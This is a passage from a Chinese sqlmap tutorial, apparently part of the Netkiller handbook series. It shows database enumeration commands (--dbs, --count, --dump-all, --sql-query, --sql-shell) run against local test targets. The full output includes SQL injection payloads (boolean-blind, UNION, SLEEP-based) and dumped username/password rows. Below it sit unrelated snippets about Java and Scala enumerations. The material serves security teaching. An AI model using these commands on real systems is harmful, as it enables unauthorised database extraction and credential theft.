3.6. Enumeration

3.6.1. dbs

$ sqlmap -u "http://172.16.0.44/test/testdb.php?id=12" --dbs
			
[*] starting at: 15:59:20

[15:59:20] [INFO] testing connection to the target url
[15:59:20] [INFO] testing if the url is stable, wait a few seconds
[15:59:22] [INFO] url is stable
[15:59:22] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[15:59:22] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[15:59:22] [INFO] testing if GET parameter 'id' is dynamic
[15:59:22] [INFO] confirming that GET parameter 'id' is dynamic
[15:59:22] [INFO] GET parameter 'id' is dynamic
[15:59:22] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
[15:59:22] [INFO] testing unescaped numeric injection on GET parameter 'id'
[15:59:22] [INFO] confirming unescaped numeric injection on GET parameter 'id'
[15:59:22] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
[15:59:22] [INFO] testing for parenthesis on injectable parameter
[15:59:22] [INFO] the injectable parameter requires 0 parenthesis
[15:59:22] [INFO] testing MySQL
[15:59:22] [INFO] confirming MySQL
[15:59:22] [INFO] query: SELECT 2 FROM information_schema.TABLES LIMIT 0, 1
[15:59:22] [INFO] retrieved: 2
[15:59:22] [INFO] performed 13 queries in 0 seconds
[15:59:22] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0

[15:59:22] [INFO] fetching database names
[15:59:22] [INFO] fetching number of databases
[15:59:22] [INFO] query: SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR(10000)), CHAR(32)) FROM information_schema.SCHEMATA
[15:59:22] [INFO] retrieved: 3
[15:59:23] [INFO] performed 13 queries in 0 seconds
[15:59:23] [INFO] query: SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR(10000)), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 0, 1
[15:59:23] [INFO] retrieved: information_schema
[15:59:27] [INFO] performed 132 queries in 4 seconds
[15:59:27] [INFO] query: SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR(10000)), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 1, 1
[15:59:27] [INFO] retrieved: groupgoods
[15:59:29] [INFO] performed 76 queries in 2 seconds
[15:59:29] [INFO] query: SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR(10000)), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 2, 1
[15:59:29] [INFO] retrieved: test
[15:59:30] [INFO] performed 34 queries in 1 seconds
available databases [3]:
[*] groupgoods
[*] information_schema
[*] test

[15:59:30] [INFO] Fetched data logged to text files under '/home/neo/.sqlmap/output/172.16.0.44'

[*] shutting down at: 15:59:30
			

3.6.2. --count

$ sqlmap -u "http://localhost/test.php?id=98" --count

    sqlmap/1.0-dev (r4843) - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 14:36:50

[14:36:51] [INFO] using '/home/neo/sqlmap-dev/output/localhost/session' as session file
[14:36:51] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[14:36:51] [INFO] testing connection to the target url
[14:36:51] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=98 AND 4108=4108

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: id=98 UNION ALL SELECT CONCAT(0x3a6b79703a,0x57596b57416f63567046,0x3a6c757a3a), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=98 AND SLEEP(5)
---

[14:36:51] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.3.6
back-end DBMS: MySQL 5.0.11
[14:36:51] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
[14:36:51] [INFO] fetching database names
[14:36:51] [INFO] fetching tables for databases: information_schema, mysql, neo, performance_schema, test
[14:36:52] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[14:36:52] [INFO] retrieved:
[14:36:52] [INFO] retrieved:
[14:36:52] [INFO] retrieved:
[14:36:53] [INFO] retrieved:
[14:36:53] [INFO] retrieved:
[14:36:53] [INFO] retrieved:
[14:36:53] [INFO] retrieved:
[14:36:53] [INFO] retrieved:
[14:36:53] [INFO] retrieved:
[14:36:53] [INFO] retrieved:
[14:36:53] [INFO] retrieved:
[14:36:54] [INFO] retrieved:
[14:36:54] [INFO] retrieved:
[14:36:54] [INFO] retrieved:
[14:36:54] [INFO] retrieved:
[14:36:54] [INFO] retrieved:
[14:36:54] [INFO] retrieved:
Database: neo
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| test                                  | 43      |
| stuff                                 | 4       |
| users                                 | 3       |
+---------------------------------------+---------+

Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 667     |
| GLOBAL_STATUS                         | 291     |
| SESSION_STATUS                        | 291     |
| GLOBAL_VARIABLES                      | 276     |
| SESSION_VARIABLES                     | 276     |
| USER_PRIVILEGES                       | 138     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 128     |
| COLLATIONS                            | 127     |
| PARTITIONS                            | 90      |
| TABLES                                | 80      |
| STATISTICS                            | 78      |
| KEY_COLUMN_USAGE                      | 64      |
| CHARACTER_SETS                        | 36      |
| SCHEMA_PRIVILEGES                     | 36      |
| TABLE_CONSTRAINTS                     | 35      |
| PLUGINS                               | 10      |
| ENGINES                               | 8       |
| SCHEMATA                              | 5       |
| PROCESSLIST                           | 1       |
+---------------------------------------+---------+

Database: mysql
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| help_relation                         | 1028    |
| help_topic                            | 508     |
| help_keyword                          | 465     |
| help_category                         | 38      |
| user                                  | 8       |
| db                                    | 3       |
| proxies_priv                          | 2       |
+---------------------------------------+---------+

[14:36:57] [INFO] Fetched data logged to text files under '/home/neo/sqlmap-dev/output/localhost'

[*] shutting down at 14:36:57

3.6.3. --dump/--dump-all

$ sqlmap -u "http://localhost/test.php?id=98" --dump-all --flush-session			

3.6.4. --sql-query

$ sqlmap -u "http://localhost/test.php?id=98" --sql-query="SELECT username, password FROM test"

    sqlmap/1.0-dev (r4843) - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 15:46:57

[15:46:58] [INFO] using '/home/neo/sqlmap-dev/output/localhost/session' as session file
[15:46:58] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[15:46:58] [INFO] testing connection to the target url
[15:46:58] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=98 AND 4108=4108

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: id=98 UNION ALL SELECT CONCAT(0x3a6b79703a,0x57596b57416f63567046,0x3a6c757a3a), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=98 AND SLEEP(5)
---

[15:46:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.3.6
back-end DBMS: MySQL 5.0.11
[15:46:58] [INFO] fetching SQL SELECT statement query output: 'SELECT username, password FROM test'
SELECT username, password FROM test [6]:
[*] neo, chen
[*] jam, zheng
[*] john, meng
[*] neo1, chen
[*] jam2, zheng
[*] john3, meng

[15:46:58] [INFO] Fetched data logged to text files under '/home/neo/sqlmap-dev/output/localhost'

[*] shutting down at 15:46:58
			

3.6.5. --sql-shell

$ sqlmap -u "http://localhost/test.php?id=98" -v 1 --sql-shell 

    sqlmap/1.0-dev (r4812) - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:54:39

[09:54:40] [INFO] using '/home/neo/sqlmap-dev/output/localhost/session' as session file
[09:54:40] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[09:54:40] [INFO] testing connection to the target url
[09:54:40] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=98 AND 8779=8779

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: id=98 UNION ALL SELECT NULL, CONCAT(0x3a72776a3a,0x546a7a6578746f575762,0x3a62746d3a), NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=98 AND SLEEP(5)
---

[09:54:40] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.3.6
back-end DBMS: MySQL 5.0.11
[09:54:40] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select * from test;
[*] chen, 98, neo
[*] chen, 111, neo
[*] zheng, 112, jam
sql-shell>

原文出处:Netkiller 系列 手札
本文作者:陈景峯
转载请与作者联系,同时请务必标明文章原始出处和作者信息及本声明。

时间: 2018-01-01

3.6. Enumeration的相关文章

scala.Enumeration 枚举示例

简介 在Scala中并没有枚举类型,但在标准类库中提供了Enumeration类来产出枚举.扩展Enumeration类后,调用Value方法来初始化枚举中的可能值. 内部类Value实际上是一个抽象类,真正创建的是Val.因为实际上是Val,所以可以为Value传入id和name 如果不指定,id就是在前一个枚举值id上加一,name则是字段名 scala枚举示例 object TrafficLightColor extends Enumeration {   type TrafficLigh

Java集合学习(十八) Iterator和Enumeration比较

这一章,我们对Iterator和Enumeration进行比较学习 第1部分 Iterator和Enumeration区别 在Java集合中,我们通常都通过 "Iterator(迭代器)" 或 "Enumeration(枚举类)" 去遍历集合.今天,我们就一起学习一下它们之间到底有什么区别. 我们先看看 Enumeration.java 和 Iterator.java的源码,再说它们的区别. Enumeration是一个接口,它的源码如下: package java

java对象群体的组织:Enumeration及Iterator类

在一般情况下,遍历集合类会使用一下方式: for(int i=0;i<v.size();i++) Customer c=(Custormer)v.get(i); 使用Enumeration类和Iterator类可以简化这个过程 1.Enumeration类 (权举) 使用范围:Vector类 方法: boolean hasMoreElement() //测试此枚举是否包含更多的元素. Enumeration nextElement() //如果此枚举对象至少还有一个可提供的元素,则返回此枚举的下

java-could not be resolved as a collection/array/map/enumeration/iterator type

问题描述 could not be resolved as a collection/array/map/enumeration/iterator type 严重: Servlet.service() for servlet jsp threw exception tag 'select', field 'list', name 'curPage': The requested list key 'pageList' could not be resolved as a collection/a

java扫盲 接口 Enumeration

一.初识Enumeration     当我写网络编程的时候,我发现了这个接口.很神奇的是以前都没用过,NetworkInterface.getNetworkInterfaces()返 回的是Enumeration载体这NetworkInterface对象.Enumeration是java.util中的一个接口类,在 Enumeration中封装了有关枚举数据集合的方法.Enumeration接口本身不是一个数据结构.但是,对其他数据结构非常重要. Enumeration接口定义了从一个数据结构

Java类集--Iterator接口、ListIterator接口、foreach及Enumeration接口

Iterator接口简介: import java.util.List ; import java.util.ArrayList ; import java.util.Iterator ; public class IteratorDemo01{ public static void main(String args[]){ List<String> all= new ArrayList<String>() ; // all.add("hello") ; all

枚举类型-staruml enumeration 类型代码无法导出 java

问题描述 staruml enumeration 类型代码无法导出 java 如题,我在staruml 里面添加了一个枚举类型.但是当导出代码的时候,却只有普通类.所有枚举类型都无法生成代码.请问有谁遇到过么?怎么破?补充:生成的事java代码

Swift学习之十六:枚举(Enumeration)

Swift中的枚举与C.OC中的枚举有很大的区别,增加了原来类中都有的特性到枚举中. 定义枚举的语法: enum SimeEnum { // enumeration goes here } 定义一个指南针的四个方向的枚举: // 使用case来表示新成员的定义开始 enum CompassPoint { case North case South case East case West } // 使用枚举 var direction = CompassPoint.West // 再次修改时,可以

使用Enumeration和Iterator遍历集合类详解_java

前言在数据库连接池分析的代码实例中,看到其中使用Enumeration来遍历Vector集合.后来就找了一些资料查看都有哪些方法可以遍历集合类,在网上找到了如下的使用Enumeration和Iterator遍历集合类的实例.不过这个实例中提到了Enumeration比Iterator的效率更高,其实并不是这样子的,该实例是的时间测试太片面了, 因为数据量太少.随着数据两的增加,两者之间的效率越来越接近,而不会出现倍数的比例.而且现在普遍都使用Iterator来遍历集合类,只有特别明确声明必须使用

ADO enumeration constants

ADO enumeration constants Each of this enum constants are defined in ADO.Click each enum below to show its constants, values and description. Connection object ConnectOptionEnum Constant Value Description adAsyncConnect 16 Opens the connection asynch